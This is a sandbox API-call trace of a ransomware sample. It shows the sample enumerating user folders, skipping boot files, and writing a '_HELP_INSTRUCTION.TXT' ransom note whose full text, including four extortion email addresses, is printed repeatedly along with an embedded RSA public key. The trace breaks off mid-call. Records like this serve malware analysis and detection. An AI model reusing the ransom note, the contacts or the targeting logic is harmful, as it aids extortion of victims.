0x0 [0035.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0035.205] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0035.205] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.205] lstrcpyW (in: lpString1=0x17cf1c, lpString2="sikvnb huvuib.contact" | out: lpString1="sikvnb huvuib.contact") returned="sikvnb huvuib.contact" [0035.205] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0035.205] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0035.206] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0xffffffff) returned 0x0 [0035.376] Sleep (dwMilliseconds=0x96) [0035.517] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0035.517] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0035.517] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0035.518] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0035.518] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0035.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0035.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0035.518] SetErrorMode (uMode=0x1) returned 0x1 [0035.518] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT") returned 60 [0035.518] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0035.518] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0035.518] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x3f4) returned 0x0 [0035.518] RegQueryValueExW (in: hKey=0x3f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e10e38, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3e10e38*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0035.518] RegCloseKey (hKey=0x3f4) returned 0x0 [0035.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0035.518] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0035.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0035.519] WriteFile (in: hFile=0x3f4, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0035.519] CloseHandle (hObject=0x3f4) returned 1 [0035.519] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0035.519] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="Contacts" [0035.519] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0035.519] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0035.519] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.520] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0035.520] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0035.520] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0035.520] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0035.520] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0035.520] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0035.520] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0035.520] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0035.520] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0035.520] SetErrorMode (uMode=0x1) returned 0x1 [0035.520] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0035.520] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0035.520] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0035.520] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0035.520] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0035.520] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0035.520] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0035.520] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0035.520] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="Desktop") returned 0x0 [0035.520] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="DESKTOP") returned 0x0 [0035.520] SetErrorMode (uMode=0x1) returned 0x1 [0035.520] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT") returned 59 [0035.521] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0035.521] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0035.521] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x3f8) returned 0x0 [0035.521] RegQueryValueExW (in: hKey=0x3f8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e11068, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3e11068*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0035.521] RegCloseKey (hKey=0x3f8) returned 0x0 [0035.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0035.521] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0035.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0035.521] WriteFile (in: hFile=0x3f8, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0035.522] CloseHandle (hObject=0x3f8) returned 1 [0035.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0035.522] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0035.522] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0035.522] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0035.522] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0035.522] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0035.522] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0035.522] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0035.522] SetErrorMode (uMode=0x1) returned 0x1 [0035.522] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0035.522] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0035.522] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0035.522] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0035.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0035.523] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="Desktop" [0035.523] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0035.523] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.523] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.523] lstrcmpW (lpString1="3wes.gif", lpString2="..") returned 1 [0035.523] lstrcmpW (lpString1="3wes.gif", lpString2=".") returned 1 [0035.523] StrStrW (lpFirst="3wes.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.523] StrStrW (lpFirst="3wes.gif", lpSrch="ntldr") returned 0x0 [0035.523] StrStrW (lpFirst="3wes.gif", lpSrch="NTLDR") returned 0x0 [0035.523] StrStrW (lpFirst="3wes.gif", lpSrch="NTDETECT.COM") returned 0x0 [0035.523] StrStrW (lpFirst="3wes.gif", lpSrch="ntdetect.com") returned 0x0 [0035.523] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.523] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.523] lstrcmpW (lpString1="cjwLkHotFDrB.csv", lpString2="..") returned 1 [0035.523] lstrcmpW (lpString1="cjwLkHotFDrB.csv", lpString2=".") returned 1 [0035.523] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.523] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="ntldr") returned 0x0 [0035.523] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="NTLDR") returned 0x0 [0035.523] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="NTDETECT.COM") returned 0x0 [0035.523] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="ntdetect.com") returned 0x0 [0035.523] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.523] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.523] lstrcmpW (lpString1="CtU1cr28O6YeLq5MF4zr.mp3", lpString2="..") returned 1 [0035.523] lstrcmpW (lpString1="CtU1cr28O6YeLq5MF4zr.mp3", lpString2=".") returned 1 [0035.523] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.523] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="ntldr") returned 0x0 [0035.523] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="NTLDR") returned 0x0 [0035.523] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0035.523] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="ntdetect.com") returned 0x0 [0035.523] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.523] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.523] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0035.523] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0035.523] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.523] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0035.523] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0035.523] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0035.523] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0035.523] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.523] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.523] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.524] lstrcmpW (lpString1="FNPUDpYy3rwMi.flv", lpString2="..") returned 1 [0035.524] lstrcmpW (lpString1="FNPUDpYy3rwMi.flv", lpString2=".") returned 1 [0035.524] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.524] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="ntldr") returned 0x0 [0035.524] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="NTLDR") returned 0x0 [0035.524] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="NTDETECT.COM") returned 0x0 [0035.524] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="ntdetect.com") returned 0x0 [0035.524] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.524] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.524] lstrcmpW (lpString1="FzoKie.rtf", lpString2="..") returned 1 [0035.524] lstrcmpW (lpString1="FzoKie.rtf", lpString2=".") returned 1 [0035.524] StrStrW (lpFirst="FzoKie.rtf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.524] StrStrW (lpFirst="FzoKie.rtf", lpSrch="ntldr") returned 0x0 [0035.524] StrStrW (lpFirst="FzoKie.rtf", lpSrch="NTLDR") returned 0x0 [0035.524] StrStrW (lpFirst="FzoKie.rtf", lpSrch="NTDETECT.COM") returned 0x0 [0035.524] StrStrW (lpFirst="FzoKie.rtf", lpSrch="ntdetect.com") returned 0x0 [0035.524] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.524] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.524] lstrcmpW (lpString1="jkGAH7YstwIc6lZC9j.gif", lpString2="..") returned 1 [0035.524] lstrcmpW (lpString1="jkGAH7YstwIc6lZC9j.gif", lpString2=".") returned 1 [0035.524] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.524] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="ntldr") returned 0x0 [0035.524] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="NTLDR") returned 0x0 [0035.524] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="NTDETECT.COM") returned 0x0 [0035.524] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="ntdetect.com") returned 0x0 [0035.524] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.524] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.524] lstrcmpW (lpString1="JYsb.gif", lpString2="..") returned 1 [0035.524] lstrcmpW (lpString1="JYsb.gif", lpString2=".") returned 1 [0035.524] StrStrW (lpFirst="JYsb.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.524] StrStrW (lpFirst="JYsb.gif", lpSrch="ntldr") returned 0x0 [0035.524] StrStrW (lpFirst="JYsb.gif", lpSrch="NTLDR") returned 0x0 [0035.524] StrStrW (lpFirst="JYsb.gif", lpSrch="NTDETECT.COM") returned 0x0 [0035.524] StrStrW (lpFirst="JYsb.gif", lpSrch="ntdetect.com") returned 0x0 [0035.524] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.524] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.524] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.524] lstrcmpW (lpString1="Lj26CzXci-whK31.wav", lpString2="..") returned 1 [0035.524] lstrcmpW (lpString1="Lj26CzXci-whK31.wav", lpString2=".") returned 1 [0035.524] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.524] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="ntldr") returned 0x0 [0035.524] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="NTLDR") returned 0x0 [0035.524] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="NTDETECT.COM") returned 0x0 [0035.524] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="ntdetect.com") returned 0x0 [0035.524] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.524] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.525] lstrcmpW (lpString1="NvEcGQE86DZ.flv", lpString2="..") returned 1 [0035.525] lstrcmpW (lpString1="NvEcGQE86DZ.flv", lpString2=".") returned 1 [0035.525] StrStrW (lpFirst="NvEcGQE86DZ.flv", 